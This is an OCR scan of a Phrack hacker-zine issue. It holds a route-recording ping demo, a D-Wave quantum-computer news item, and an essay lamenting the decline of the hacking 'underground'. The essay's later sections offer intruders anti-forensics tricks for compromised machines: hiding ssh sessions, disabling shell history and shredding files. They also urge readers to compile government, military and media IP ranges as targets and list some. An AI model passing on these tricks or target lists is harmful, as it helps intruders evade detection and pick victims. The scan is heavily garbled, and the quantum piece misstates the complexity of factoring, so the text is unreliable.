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Hop #5 is on comcast’s network. Hop #6 is their transit provider. We 
want to send a ping -R to the transit provider 
(63.210.62.58); 


[root@phrack root]# ping -R 63.210.62.58 

PING 63.210.62.58 (63.210.62.58) from XXX.XXX.XXX.XXX : 56(124) bytes 

of data. 

64 bytes from 63.210.62.58: icmp_seq=0 tt1l=243 time=31.235 msec 

NOP 

RR: [snip] 
68.87.129.138 
68.86.90.90 
4.68.121.50 
4.68.127.153 
12.01 23.68). 117 


117.8.123.12.in-addr.arpa. domain name pointer 
sarl-a360s3.wswdc.ip.att.net. 


An AT&T hop on Level3’s network? Wow, we are still safely under the 
watchful eye of our magnificent benevolent intelligence agencies. I 
feel safer already. 


--[ 5. D-Wave demonstrates a quantum computer 
by aris 


February the 13’th, 2007, Wave computing made a public demonstration 
of their brand-new quantum computer, which could be a revolution in 
computing and in cryptography in general. The demonstration took 
place at Mountain View, Silicon Valley, though the quantum computer 
itself was left at Vancouver, remotely connected by Internet. 


The Quantum computer is a hybrid construction of classical computing and 
a quantum "accelerator" chip: The classical computer makes the ordinary 
operations, isolates the complicate stuff, prepare it to be processed 

by the quantum chip then gives back the results. The whole mechanism 

is meant to be usable over networks (with RPC) to be accessible for 
companies that want a quantum computer but can’t manage to handle it 

at their main office (The hardware has special requirements). [1] 


The quantum chip is a 16 Qbits engine, using superconductiong 
electronics. 


Previous tries to do quantum computers were made previously, none of them 
known to have more than 3 or 4 Qbits. D-Wave also pretends being able 

to scale that number of Qbits up to 1024 in 2008 ! That fact made a lot 
of people in scientific area skeptic about the claims of D-Wave. The US 
National Aeronautics and Space Administration (commonly known as NASA) 
confirmed to the press that they’ve built the special chip for D-Wave 
conforming their specifications. [2] 


Now, how does the chip works ? D-Wave hasn’t released that much details 
about the internals of their chip. They have chosen the superconductor 
because it makes easier to exploit quantum mechanics. When atoms are 
very cold (approaching the OK), they transform themselves into 
superconducting atoms. They have special characteristics, including the 
fact their electrons get a different quantum behaviur. 


In the internals, the chips contains 16 Qbits arranged in a 4x4 grid, 
each Qbit being coupled with its four immediate neighbors and some in 
the diagonals. [3] 

The coupling of Qbits is what gives them their power : a Qbit is 
believed to be at two states at same time. When coupling two Qbits, 

the combination of their state contains four states, and so on. 

The more Qbits are coupled together, the more possible number of states 
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they have, and when working an algorithm on them, you manipulate all 
of their states at once, giving a very important performance boost. By 
its nature, it may even help to resolve NP-Complete problems, that is, 
problems that cannot be resolved by polynomial algorithms (we think 

of large sudoku maps, multivariate polynomial systems, factoring large 
integers ...). 


Not coupling all of their Qbits makes their chip easier to build and 
to scale, but their 16Qbits computer is not equal to the theoretical 16 
Qbits computers academics and governments are trying to build for years. 


The impact of this news to the world is currently minimal. Their chips 
currently work slower than a low-range personal computer and costs 
t 
Ss 


housands of dollars, but maybe in some years it will become a real 
olution for solving NP problems. 


The NP problem that most people involved in security know is obviously 
the factoring of large numbers. W ven have a proof that it exists 

a *linear* algorithm to factorize a multiple of two large integers, 

it is named Shor’s algorithm. It means when we’1ll have the hardware 

to run it, factorizing a 1024 bits RSA private key will only take two 
times the time needed to factorize a 512 bits key. 


It completely destroys the security of the public cryptography as we 
know it now. 

Unfortunaly, we have no information on which known quantum algorithms 
run on D-Wave computer, and D-Wave made no statement about running 
Shor’s algorithm on their beast. Also, no claim have been given letting 
us think the chip could break RSA. And for sure, NSA experts probably 
already studied the situation (in the case they don’t already own their 
own quantum computer). 


References: 


[1] http://www. dwavesys.com/index.php?page=quantum-computing 
[2] http://www.itworld.com/Tech/3494/070309nasaquantum/index.html 
[3] http://arstechnica.com/articles/paedia/hardware/quantum.ars 
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6. Conclusion 


--[{ 1. Introduction 


"It’s been a long long time, 

I kept this message for you, Underground 

But it seems I was never on time 

Still I wanna get through to you, Underground..." 


I am sure most of you know and love this song (Stir it Up). After all, 
who doesn’t like a Bob Marley song? The lyrics of this song fit very well 
with my feeling : I was never on time but now I’m ready to deliver you 
the message. 


So what is this article about? I could write another technical article 
about an eleet technique to bypass a buffer overflow protection, how to 
inject my magical module in the kernel, how to reverse like an eleet or 
even how to make a shellcode for a not-so-famous OS. But I won’t. There 
are some other people who can do it much better than I could. 


But it is the reason not to write a technical article. The purpose of 
this article is to launch an SOS. An SOS to the scene, to everyone, to all 
the hackers in the world. To make all the next releases of Phrack better 
than ever before. And for this I don’t need a technical article. I need 
what I would call Spirit. 


Do you know what I mean by the word spirit? 


--[ 2. The security paradox. 


There is something strange, really strange. I always compare the 
security world with the drug world. Take the drugs world, on the one side 
you have all the "bad" guys: cartels, dealers, retailers, users... On 
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the other side, you have all the "good" guys: cops, DEA, pharmaceutical 
groups creating medicines against drugs, president of the USA asking for 
more budget to counter drugs... The main speech of all these good guys 
is : "we have to eradicate drugs!". Well, why not. Most of us agree. 


But if there is no more drugs in the world, I guess that a big part 
of the world economy would fall. Small dealers wouldn’t have the money to 
buy food, pharmaceutical groups would loose a big part of their business, 
DEA and similar agencies wouldn’t have any reason to exist. All the 
drugs centers could be closed, banks would loose money coming from the 
drugs market. If you take all thoses things into consideration, do 
you think that governments would want to eradicate drugs? Asking the 
question is probably answering it. 


Now lets move on to the security world. 


On the one side you have a lot of companies, conferences, 
open source security developers, computer crime units... On the 
other side you have hackers, script kiddies, phreackers.... Should 
I explain this again or can I directly ask the question? Do you really 
think that security companies want to eradicate hackers? 


To show you how these two worlds are similar, lets look at another 

xample. Sometimes, you hear about the cops arrested a dealer, maybe a 
big dealer. Or even an entire cartel. "Yeah, look ! We have arrested a 
big dealer ! We are going to eradicate all the drugs in the world!!!". And 
sometimes, you see a news like "CCU arrests Mafiaboy, one of the best 
hacker in the world". Computer crime units and DEA need publicity - they 
arrest someone and say that this guy is a terrorist. That’s the best way 
to ask for more money. But they will rarely arrest one of the best hackers 
in the world. Two reasons. First, they don’t have the intention (and if 
they would, it’s probably to hire him rather than arrest him). Secondly, 
most of the Computer Crime Units don’t have the knowledge required. 


This is really a shame, nobody is honest. Our governments claim that 
they want to eradicate hackers and drugs, but they know if there were 
no more hackers or drugs a big part of the world economy could fall. It’s 
again exactly the same thing with wars. All our presidents claim that we 
need peace in the world, again most of us agree. But if there are no more 
wars, companies like Lockheed Martin, Raytheon, Halliburton, EADS, SAIC... 
will loose a huge part of their markets and so banks wouldn’t have 
the money generated by the wars. 


The paradox relies in the perpetual assumption that threat is 
generated from abuses where in fact it might comes from inproper 
technological design or money driven technological improvement where th 
last element shadows the first. And when someone that is dedicated enough 
digs it, we have a snowball effect, thus every fish in the pound at one 
time or an other become a part of it. 


And as you can see, this paradox is not exclusive to the security 
industry/underground or even the computer world, it could be considered 
as the gold idol paradox but we do not want to get there. 


In conclusion, the security world need a reason to justify its 
business. This reason is the presence of hackers or a threat (whatever 
hacker means), the presence of an hackers scene and in more general terms 
the presence of the Underground. 


We don’t need them to exist, we exist because we like learning, 
learning what we are not supposed to learn. But they give us another good 
reason to exist. So if we are "forced" to exist, we should exist in 
the good way. We should be well organized with a spirit that reflect our 
philosophy. Unfortunately, this spirit which used to characterized us is 
long gone... 


--[ 3. Past and Present Underground scene 
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The "scene", this is a beautiful word. I am currently in 
very far away from all of your countries, but it is still an 


a country 


industrialized country. After spending some months in this country, I found 


some old-school hackers. When I asked them how the scene was 


in their 


country, they always answered the same thing: "like everywhere, dying". It’s 


a shame, really a shame. 
the Underground scene is dying. 


The security world is getting larger and larger and 


I am not an old school hacker. I don’t have the pretension to claim 
it I would rather say that I have some old-school tricks or maybe that my 
mind is old-school oriented, but that’s all. I started to enjoy the 
hacking life more or less 10 years ago. And the scene was already dying. 


When I started hacking, like a lot of people, I have read all the past 
issues of Phrack. And I really enjoyed th xperience. Nowadays, 


I’m pretty sure that new hackers don’t read old Phrack articl 


Le€S anymore. 


Because they are lazy, because they can find information elsewhere, 


because they think old Phracks are outdated... But reading ol 


ld Phracks is 


not only to acquire knowledge, it’s also to acquire the hacking spirit. 


----[ 3.1 A lack of culture and respect for ancient hackers 


How many new hackers know the hackers history? A simple example is 
Securityfocus. I’m sure a lot of you consult its vulnerabilities 


database or some mailing list. Maybe some of you know Kevin Poulsen who 
worked for Securityfocus for some years and now for Wired. But how many of 


you know his history? How many knew that at the beginning of 


the 80’s he 


was arrested for the first time for breaking into ARPANET? And that he 
was arrested a lot more times after that as well. Probably not a lot 


(what’s ARPANET after all...). 


It’s exactly the same kind of story with the most famous 


hacker in 


the world: Kevin Mitnick. This guy really was amazing and I have a 
total respect for what he did. I don’t want to argue about his present 
activity, it’s his choice and we have to respect it. But nowadays, 
when new hackers talk about Kevin Mitnick, one of the first things I 


hear is : "Kevin is lame. Look, we have defaced his website, 


we are much 


better than him". This is completely stupid. They have probably found a 


stupid web bug to deface his website and they probably found 


the way to 


exploit the vulnerability in a book like Hacking Web Exposed. And after 
reading this book and defacing Kevin’s website, they claim that Kevin 

is lame and that they are the best hackers in the world... Where are we 
going? If these hackers could do a third of what Kevin did, they would 


be considered heroes in the Underground community. 


Another part of the hacking culture is what some people name "Th 
Great Hackers War" or simply "Hackers War". It happened 15 years ago 
between probably the two most famous (best?) hackers group which had 

ver existed: The Legion of Doom and Master of Deception. Despite that 
this chapter of the hacking history is amazing (google it), what I 


wonder is how many hackers from the new generation know that 


famous 


hackers like Erik Bloodaxe or The Mentor were part of these groups. 
Probably not a lot. These groups were mainly composed of skilled and 
talented hackers/phreackers. And they were our predecessor. You can still 
find their profiles in past issues of Phrack. It’s still a nice read. 


Let’s go for another example. Who knows Craig Neidorf? Nobody? Maybe 
Knight Lightning sounds more familiar for you... He was the first editor 


in chief of Phrack with Taran King, 


Taran King who called him his 


"right hand man". With Taran King and him, we had a lot of good articles, 
spirit oriented. So spirit oriented that one article almost sent him 

to jail for disclosing a confidential document from Bell South. 
Fortunately, he didn’t go in jail thanks to the Electronic Frontier 
Foundation who preached him. Craig wrote for the first time in Phrack 
issue 1 and for the last time in Phrack issue 40. He is simply the best 
contributor that Phrack has ever had, more than 100 contributions. Not 
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interesting? This is part of the hacking culture. 


More recently, in the 90’s, an excellent "magazine" (it was more a 
collection of articles) called F.U.C.K. (Fucked Up College Kids) was 
made by a hacker named Jericho... Maybe some new hackers know Jericho for 
his work on Attrition.org (that’s not sure...), but have you already taken 
time to check Attrition website and consult all the good work that Jericho 
and friends do? Did you know that Jericho wrote excellent Phrack World 
News under the name Disorder 10 years ago (and trust me his news were 
great) ? Stop thinking that Attrition.org is only an old dead mirror of 
web site defacements, it’s much more and it’s spirit oriented. 


Go ask Stephen Hawking if knowing the scientific story is not 
important to understand the scientific way/spirit... Do you think that 
Stephen doesn’t know the story of Aristotle, Galileo, Newton or Einstein ? 


To help wannabe hackers, I suggest that they read "The Complete 
History of Hacking" or "A History of Computer Hacking" which are very 
interesting for a first dive in the hacking history and that can easily be 
found with your favorite search engin 


Another good reading is the interview of Erik Bloodaxe in 1994 
(http://www.eff.org/Net_culture/Hackers/bloodaxe-goggans_94.interview) 
where Erik said something really interesting about Phrack: 


"I, being so ridiculously nostalgic and sentimental, didn’t want to see 

it (phrack) just stop, even though a lot of people always complain about 
the content and say, "Oh, Phrack is lame and this issue didn’t have enough 
info, or Phrack was great this month, but it really sucked last month." 
You know, that type of thing. Even though some people didn’t always 

agree with it and some people had different viewpoints on it, I really 
thought someone needed to continue it and so I kind of volunteered for 
Ate” 


It’s still true... 


----[ 3.2 A brief history of Phrack 


Let’s go for a short hacking history course and let’s take a look at 
old Phracks where people talked about the scene and what hacking is. 


Phrack 41, article 1: 


"The type of public service that I think hackers provide is not showing 
security holes to whomever has denied their existence, but to merely 
embarrass the hell out of those so-called computer security experts 

and other purveyors of snake oil." 


This is true, completely true. This is closely related to what I said 
before. If there are no hackers, there are no security experts. They 
need us. And we need them. (We are family) 


Phrack 48, article 2: 


At the end of this article, there is the last editorial of Erik 
Bloodaxe. This editorial is excellent, everyone should read it. I will 
just reproduce some parts here: 


",.. The hacking subculture has become a mockery of its past self. 
People might argue that the community has "evolved" or "grown" somehow, 
but that is utter crap. The community has degenerated. It has become a 
media-fueled farce. The act of intellectual discovery that hacking once 
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represented has now been replaced by one of greed, self-aggrandization 
and misplaced post-adolescent angst... If I were to judge the health of 
the community by the turnout of this conference, my prognosis would be 
"terminally i11."..." 


And this was in 1996. If we ask to Erik Bloodaxe now what he thinks 
about the current scene, I’m pretty sure he would say something 
like: "irretrievable" or "the hacking scene has reached a point of no 
return". 


"...There were hundreds of different types of systems, hundreds 

of different networks, and everyone was starting from ground zero. 

There were no public means of access; there were no books in stores or 
library shelves espousing arcane command syntaxes; there were no classes 
available to the layperson. ..." 


Have you ever heard of a "hackademy"? Nowadays, if you want to be a 
hacker it’s really easy. Just go to a hacker school and they will teach 
you some of the more eleet tricks in the world. That’s the new hacker way. 


"Hacking is not about crime. You don’t need to be a criminal to be 

a hacker. Hanging out with hackers doesn’t make you a hacker any more 
than hanging out in a hospital makes you a doctor. Wearing the t-shirt 
doesn’t increase your intelligence or social standing. Being cool doesn’t 
mean treating everyone like shit, or pretending that you know more than 
everyone around you." 


So what is hacking? My point of view is that hacking is a philosophy, 
a philosophy of life that you can apply not only to computers but to 
a lot of things. Hacking is learning, learning computers, networks, 
cryptology, telephone systems, spying system and agencies, radio, what 
our governments hide... Actually all non-conventional subjects or what 
could also be called a third eye view of the context. 


"There are a bunch of us who have reached the conclusion that the "scene" 
is not worth supporting; that the cons are not worth attending; that the 
new influx of would-be hackers is not worth mentoring. Maybe a lot of us 
have finally grown up." 


Here’s my answer to Erik 10 years later: "No Eric, you hadn’t finally 
grown up, you were right." Erik already sent an SOS 10 years ago and 
nobody heard it. 


Phrack 50, article 1: 


"It seems, in recent months, the mass media has finally caught onto 
what we have known all along, computer security _IS_ in fact important. 
Barely a week goes by that a new vulnerability of some sort doesn’t pop up 


on CNN. But the one thing people still don’t seem to fathom is that _WE_ 
are the ones that care about security the most... We aren’t the ones that 
the corporations and governments should worry about... We are not 


the enemy." 


No, we are not the enemy. But a lot of people claim that we are and 
some peopl ven sell books with titles like "Know your enemy". It’s 
probably one of the best ways to be hated by a lot of hackers. Don’t be 
surprised if there are some groups like PHC appearing after that. 


Phrack 55, article 1: 


Here I will show you the arrogance of the not-so-far past editor, 
answering some comments: 


",..Yeah, yeah, Phrack is still active you may say. Well let me tell 
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you something. Phrack is not what it used to be. The people who make 
Phrack are not Knight Lightning and Taran King, from those old BBS 

days. They are people like you and me, not very different, that took 
on themselves a job that it is obvious that is too big for them. Too 


big? hell, HUGE. Phrack is not what it used to be anymore. Just try 
reading, let’s say, Phrack 24, and Phrack 54..." 


And the editor replied (maybe Route): 


"bjx of "PURSUIT" trying to justify his ‘old-school* ezine. bjx wrote 
a riveting piece on "Installing Slackware" article. Fear and respect 
the lower case "i"™". 


This is a perfect example of how the Underground scene has grown up in 
the last few years. We can interpret editor’s answer like "I’m writing 
some eleet articles and not you, so I don’t have to take into 
consideration your point of view". But it was a really pertinent remark. 


Phrack 56, article 1: 


Here is another excellent example to show you the arrogance of the 
Underground scene. Again, it’s an answer to a comment from someone: 


"...IMHO it hasn’t improved. Sure, some technical aspects of the 

magazine have improved, but it’s mostly a dry technical journal these 
days. The personality that used to characterize Phrack is pretty much 
non-existant, and the editorial style has shifted towards one of ‘I know 
more about buffer overflows than you* arrogance. Take a look at the Phrack 
Loopback responses during the first 10 years to the recent ones. A much 
higher percentage of responses are along the lines of ‘you’re an idiot, 

we at Phrack Staff are much smarter than you.*..." 


And the reply: 


" — Trepidity <delirium4u@theoffspring.net> apparently still bitter at 
not being chosen as Mrs. Phrack 2000." 


IMHO, Trepidity’s remark was probably the best remark for a long long 
time. 


Let’s stop this little history course. I have showed you that I’m 
not alone in my reflection and that there is something wrong with the 
current disfunctional scene. Some people already thought this 10 years ago 
and I know that a lot of people are currently thinking exactly the same 
thing. The scene is dying and its spirit is flying away. 


I’m not Erik Bloodaxe, I’m not Voyager or even Taran King ... I’m 
just me. But I would like to do something like 15 years ago, when the 
word hacking was still used in the noble sense. When the spirit was still 


there. We all need to react together or the beast will eat whats left 
of the spirit. 
----[ 3.3 The current zombie scene 


"A dead scene whose body has been re-animated but whose the spirit 
is lacking". 


I’m not really aware of every /’groups’ in the world. Some people are 
much more connected than me. And to be honest, I knew the scene better 5 
years ago than I do now. But I will try to give you a snapshot of what 
the current scene is. Forgive me in advance for the groups that I will 
forget, it’s really difficult to have an accurate snapshot. The best way 
to have a snapshot of the current scene is probably to use an algorithm 
like HITS which allow to detect a web community. But unfortunately I don’t 
have time to implement it. 
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All of these people make up the current scene. It’s a big mixture 
between white/gray/black hats, where some people are white hat in the day 
and black hat at night (and vice-versa). Sometimes there are communication 
between them, sometimes not. I also have to say that it’s generally the 
people from layer 1 groups who give talks to security conferences around 
the world... 


It’s really a shame that PHC is probably the best ambassador of the 
hacking spirit. Their initiative was great and really interesting. 
Moreover they are quite funny. But IMHO, they are probably a little too 
arrogant to be considered like an old spirit group. 


Actually, the bad thing is that all these people are more or less 
separate and everyone is fighting everyon lse. You can even find some 
hackers hacking other hackers! Where is the scene going? Even if you are 
technically very good, do you have to say to everyone that you are 
the best one and naming others as lamerz? The new hacker generation 
will never understand the hacking spirit with this mentality. 


Moreover the majority of hackers are completely disinterested by 
alternate interesting subjects addressed for example in 2600 magazine or 
on Cryptome website. And this is really a shame because these two media 
are publishing some really good information. Most hackers are only 
interested by pure hacking techniques like backdooring, network 
exploitation, client vulnerabilities... But for me hacking is closely 
related to other subjects like those addressed on Cryptome website. For 
example the majority of hackers don’t know what SIPRnet is. There is only 
one reference in Phrack, but there are several articles about SIPRnet in 
2600 magazine or on Cryptome website. When I want to discuss about all 
these interesting subjects it’s really difficult to find someone in the 
scene. And to be honest the only people that I can find are people away 
from the scene. The majority of hackers composing the groups I mentioned 
above are not interested by these subjects (as far as I know). Old school 
hackers in 80’s or 90’s were more interested by alternated subjects than 
the new generation. 


In conclusion, firstly we have to get back the old school hacking 
spirit and afterwards explain to the new generation of hackers what it is. 


It’s the only way to survive. The scene is dying but I won’t say 
that we can’t do anything. We can do something. We must do something. 
It’s our responsibility. 


--[ 4 Are security experts better than hackers? 


STOP! !!}!}! IT do not want to say that security experts are better than 


4.txt Wed Apr 26 09:43:45 2017 9 


hackers. I don’t think they are, but to be honest it’s not really 
important. It’s nonsense to ask who is better. The best guy, independent 
from the techniques he used, is always the most ingenious. But there 

are two points that I would like to develop. 


—---[ 4.1 The beautiful world of corporate security 


I met a really old school hacker some months ago, he told me something 
very pertinent and I think he was right. He told me that the technology 
has really changed these last years but that the old school tricks still 
work. Simply because the people working for security companies don’t 
really care about security. They care more about finding a new eleet 
technique to attack or defend a system and presenting it to a security 
conference than to use it in practice. 


So Underground, we have a problem. A major problem. 15 years ago, 
there were a lot of people working for the security industry. At times, 
there also were a lot of people working in what I will call the 
Underground scene. No-one can estimate the percentage in each camp, but 
I would say it was something like 60% working in security and 40% working 
in the Underground scene. It was still a good distribution. Nowadays, I’m 
not sure it’s still true. A better estimation should be 80/20 orientated 
to security or maybe even worse... There are increasingly more and more 
people working for the security world than for the Underground scene. Look 
at all these "eleet" security companies like ISS, Core Security, Immunity, 
IDefense, eEye, @stake, NGSSoftware, Checkpoint (!), Counterpane, Sabre 
Security, Net-Square, Determina, SourceFire...I will stop here otherwis 
Google will make some publicity for these companies. All these security 
companies have hired and still hire some hackers, even if they will say 
that they don’t. Sometimes, they don’t even know they hired a hacker. How 
many past Phrack writers work for these companies? My guess is a lot, 
really a lot. After all, you can’t stop a hacker if you have never been 
one... 


You’1ll tell me: "that’s normal, everyone has to eat". Yeah, that’s 
true. Everyone has to eat. I’m not talking about that. What I don’t like 
(even if we do need these good and bad guys) is all the stuff around the 
security world: conferences, (false) alerts, magazines, mailing lists, 
pseudo security companies, pseudo security websites, pseudo security 
books... 


Can you tell me why there is so much security related stuff and not 
so much Underground related stuff? 


--[ 4.2 The in-depth knowledge of security conferences 


If you have a look at all the topics addressed in a security 
conference, it’s amazing. Take the most famous conferences: *Blackhat, 
*SecWest or even Defcon (I mention only marketing conferences, there ar 
others good conferences that are less corporate/business oriented like 
ccc, PH neutral, HOPE or WTH). Now look at the talks given by the 
speakers, they’re really good. When I went to a security conference 5 
years ago it was so funny, I was saying to my friends: "these guys are 
5 years late". It was true then but I think it’s not true anymore. They 
are probably still late, but not as late as they were. But the most 
relevant point for me is that recently there have been a lot of very 
interesting subjects. OK not everything was interesting - there were 
some shit subjects too. What I would consider as interesting subjects 
are those related to new technologies (VOIP, WEB 2.0, RFID, BlackBerry, 


GPS...) or original topics like hardware hacking, BlackOps, agency 
relationships, SE story, bioinfo attack, nanotech, PsyOp... What the 
Fuck ?!#@?! 10 years ago, all the original topics were released in an 


Underground magazine like Phrack or 2600. Not in a security conference 
where you have to pay more than $1000. 


This is not my idea of what hacking should be. Do you really need 
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publicity like this to feel good? This is not hacking. I’m not talking 
here about the core but the form. When I’m coding something at home all 
night and in the morning it works, it’s really exciting. And I don’t 
have to say to everyone "look at what I did!". Especially not in public 
where people have to pay more than $1000 to hear you. 


Another incredible thing about these security conferences is what I 
would call the "conference circuit". Nowadays, if you are a security 
expert, the trend is to give the same talk at different security 
conferences around the world. More than 50% of all security experts are 
doing this. They go in America at BlackHat, Defcon and CanSecWest, after 
they move in Europe and they finish in Asia or Australia. They can even 
do BlackHat America, BlackHat Europe and BlackHat Asia! Like Roger 
Federer or Tiger Woods, they try to do the Grand Slam! So you can find 
a conference given in 2007 which is more or less the same than one in 
2005. Thus it seems we have now a new profession in our wonderful 
security world: "conferences runner" ! 


Last funny thing is the number of conferences that I will include in 
the category "How to hack the system XXX". For example at the last 
Blackhat USA there was a conference on how to hack an embedded device, 
for example printers and copiers. Despite the fact that it’s interesting 
(collecting document printed), what I find funny is the fact that you 
just have to hack a non conventional device to be at Blackat or Defcon. 
So, I will give some good advice to hackers who want to become famous: 
try to hack the coffee machine used by the FBI or th mbedded devic 
used by the lift of the Pentagon and everyone will see you as a hero 
or a terrorist (thats context based). 


--[{ 5. Phrack and the axis of counter-attack 


Now that I have given you an overview of the security world, let’s 
try to see how we can change it. There are two possibilities here. The 
first one is this:- I say to you "OK now that you really understand the 
problem, it’s definitely time to change our mentality. This is the new 
mind set that we have to adopt". It’s a little bit pretentious to say 
this though. Nobody can solve the problem alone and pretend to bring the 
good solution. So I guess that the first possibility won’t work. People 
will agree but nobody will do anything. 


The second possibility is to start with Phrack. All the people who 
make up The Circle of Lost Hackers agree that Phrack should come back to 
its past style when the spirit was present. We really agree with the quote 
above which said that Phrack is mainly a dry technical journal. It’s 
why we would like to give you some idea that can bring back to Phrack its 
bygone aura. Phrack doesn’t belong to a group a people, Phrack belongs to 

veryone, everyone in the Underground scene who want to bring something 
for the Underground. After all, Phrack is a magazine made by the community 
for the community. 


We would like to invite everyone to give their point of view about the 
current scene and the orientation that Phrack should take in the future. 
We could compile a future article with all your ideas. 


----[ 5.1. Old idea, good idea 


If you take a look at the old Phrack, there are some recurring 
articles 


Phrack LoopBack 

Line noise 

Phrack World News 
Phrack Prophiles 
International scenes 


+ + + F 


Here’s something funny about Phrack World News, if you take a look 
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at Phrack 36 it was not called "Phrack World News" but instead it was 
"Elite World News"... 


So, all these articles were and are interesting. But in these 
articles, we would like to resuscitate the last one: "International 
scenes". A first essay is made in this issue, but we would like people 
to send us a short description of their scene. It could be very 
interesting to have some descriptions of scenes that are not common, 
for example the China scene, the Brazilian scene, the Russian scene, 
the African scene, the Middle East scene... But of course we are also 
interested in the more classic scenes like Americas, GB, France, Germany, 
... Everything is welcome, but hackers all over the world are not only 
hackers in Europe-Americas, we’r verywhere. And when we talk about the 
Underground scene, it should include all local scenes. 


----[ 5.2. Improving your hacking skills 


Here we would like to start a new kind of article. An article whose 
purpose is to give to the new generation of hackers some different little 
tricks to hack "like an eleet". This article will be present in every 
new issue (at least until it’s dead ... we hope not soon). The idea is 
to ask to everyone to send us their tricks when they hack something 
(it could be a computer or not). The tricks should be explained in no 
more than 30 lines, and it could even be one line. It could be an eleet 
trick or something really simple but useful. Example: 


An almost invisible ssh connection 


In the worse case if you have to ssh on a box, do it every time 
with no tty allocation 


ssh -T user@host 
If you connect to a host with this way, a command like "w" will not 
show your connection. Better, add ’bash -i’ at the end of the command to 
simulate a shell 
ssh -T user@host /bin/bash -i 
Another trick with ssh is to use the -o option which allow you to 


specify a particular know_hosts file (by default it’s ~/.ssh/know_hosts). 
The trick is to use -o with /dev/null: 


ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i 


With this trick the IP of the box you connect to won’t be logged in 
know_hosts. 


Using an alias is a good idea. 


Erasing a file 


In the case of you have to erase a file on a owned computer, try 
to use a tool like shred which is available on most of Linux. 


shred -n 31337 -z -u file_to_delet 


—n 31337 : overwrite 313337 times the content of the file 
-z : add a final overwrite with zeros to hide shredding 
-u : truncate and remove file after overwriting 


A better idea is to do a small partition in RAM with tmpfs or 
ramdisk and storing all your files inside. 
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Again, usSing an alias is a good idea. 


The quick way to copy a file 


If you have to copy a file on a remote host, don’t bore yourself with 
an FTP connection or similar. Do a simple copy and paste in your Xconsole. 
If the file is a binary, uuvencode the file before transferring it. 


A more eleet way is to use the program ’screen’ which allows copying a 
file from one screen to another: 


To start/stop : C-a H or C-a : log 


And when it’s logging, just do a cat on the file you want to transfer. 


Changing your shell 


The first thing you should do when you are on an owned computer is to 
change the shell. Generally, systems are configured to keep a history for 
only one shell (say bash), if you change the shell (say ksh), you won’t be 
logged. 


This will prevent you being logged in case you forget to clean 
the logs. Also, don’t forget ’unset HISTFILE’ which is often useful. 


Some of these tricks are really stupid and for sure all old school 
hackers know them (or don’t use them because they have mor leet tricks). 
But they are still useful in many cases and it should be interesting to 
compare everyone’s tricks. 


----[ 5.3. The Underground yellow pages 


Another interesting idea is to maintain a list of all the interesting 
IP ranges in the world. This article will be called "Meaningful IP 
ranges". We have already started to scan all the class A and B networks. 
What is really interesting is all the IP addresses of agencies which are 
supposed to spy us. Have a look at this site: 


http://www.milnet.com/iagency.htm 

However we don’t have to focus our list on agencies, but on everything 
which is supposed to be the power of the world. 
It includes: 


* All agencies of a country (China, Russia, UK, France, Israel...) 


* All companies in a domain, for example all companies related to private 
secret service or competitive intelligence or financial clearing or 
private army (dyncorp, CACI, MPRI, Vinnel, Wackenhut, ...) 


* Companies close to government (SAIC, Dassault, QinetiQ, Halliburton, 
Bechtel...) 


* Spying business companies (AT&T, Verizon, VeriSign, AmDocs, BellSouth, 
Top Layer Networks, Narus, Raytheon, Verint, Comverse, SS8, pen-link...) 


* Spoken Medias (Al Jazeera, Al Arabia, CNN, FOX, BBC, ABC, RTVi, ...) 


* Written Medias or press agencies (NY/LA Times, Washington Post, 


4.txt Wed Apr 26 09:43:45 2017 13 


Guardian, Le monde, El Pais, The Bild, The Herald, Reuters, AFP, AP, 
TASS, UPI...) 


* All satellite maintainers (Intelsat, Eurosat, Inmarsat, Eutelsat, 
Astra...) 


* Suspect investment firms (Carlyle, In-Q-Tel...) 


* Advanced research centers (DARPA, ARDA/DTO, HAARP...) 


* Secret societies, fake groups and think-tanks (The Club of Rome, The 
Club of Berne, Bilderberg, JASON group, Rachel foundation, CFR, ERT, 
UNICE, AIPAC, The Bohemian Club, Opus Dei, The Chatman House, Church of 
Scientology...) 


* Guerilla groups, rebels or simply alternative groups (FARC, ELN, ETA, 
KKK, NPA, IRA, Hamas, Hezbolah, Muslim Brothers...) 


* Ministries (Defense, Energy, State, Justice...) 


* Militaries or international polices (US Army, US Navy, US Air Force, 
NATO, European armies, Interpol, Europol, CCU...) 


* And last but not least: HONEYPOT! 


It’s obvious that not all ranges can be obtained. Some agencies ar 
registered under a false name in order to be more discrete (what about 
ENISA, the European NSA?), others use some high level systems (VPN, tor 

-) on top of normal networks or simply use communication systems other 
than the Internet. But we would like to keep the most complete list we 
can. But for this we need your help. We need the help of everyone in 
the Underground who is ready to share knowledge. Send us your range. 


We started to scan the A and B range with a little script we made, 


but be sure that the more interesting range are in class C. Here is a 
quick start of the list 
11.0.0.0 - 11.255.255.255 : DoD Network Information Center 
144.233.0.0 - 144.233.255.255 : Defense Intelligence Agency 
144.234.0.0 - 144.234.255.255 : Defense Intelligence Agency 
144.236.0.0 - 144.236.255.255 Defense Intelligence Agency 
144.237.0.0 - 144.237.255.255 Defense Intelligence Agency 
144.238.0.0 - 144.238.255.255 Defense Intelligence Agency 
144.239.0.0 - 144.239.255.255 Defense Intelligence Agency 
144.240.0.0 - 144.240.255.255 Defense Intelligence Agency 
144.241.0.0 - 144.241.255.255 Defense Intelligence Agency 
144.242.0.0 - 144.242.255.255 : Defense Intelligence Agency 
162.45.0.0 - 162.45.255.255 : Central Intelligence Agency 
62.46.0.0 - 162.46.255.255 : Central Intelligence Agency 
-16.0.0 —- 130.16.255.255 : The Pentagon 
-11.0.0 - 134.11.255.255 : The Pentagon 
152.0 - 134.152.255.255 : The Pentagon 
205.0 —- 134.205.255.255 : The Pentagon 
140.185.255.255 : The Pentagon 


—- 141.116.255.255 : Army Information Systems Command-Pentagon 

-255.255.255 : DoD Network Information Center 

-20.0.0 - 128.20.255.255 : U.S. Army Research Laboratory 

-63.0.0 - 128.63.255.255 : U.S. Army Research Laboratory 
0 - 129.229.255.255 : United States Army Corps of Engineers 

0 - 131.218.255.255 : U.S. Army Research Laboratory 

0 - 134.194.255.255 : DoD Network Information Center 

-0O - 134.232.255.255 : DoD Network Information Center 

0 

0 
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— 137.128.255.255 : U.S. ARMY Tank-Automotive Command 
-— 144.252.255.255 : DoD Network Information Center 
155.8.255.255 : DoD Network Information Center 

.3.0.0 - 158.3.255.255 : Headquarters, USAAISC 

-12.0.0 - 158.12.255.255 : U.S. Army Research Laboratory 
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164.225.0.0 - 164.225.255.255 DoD Network Information Center 
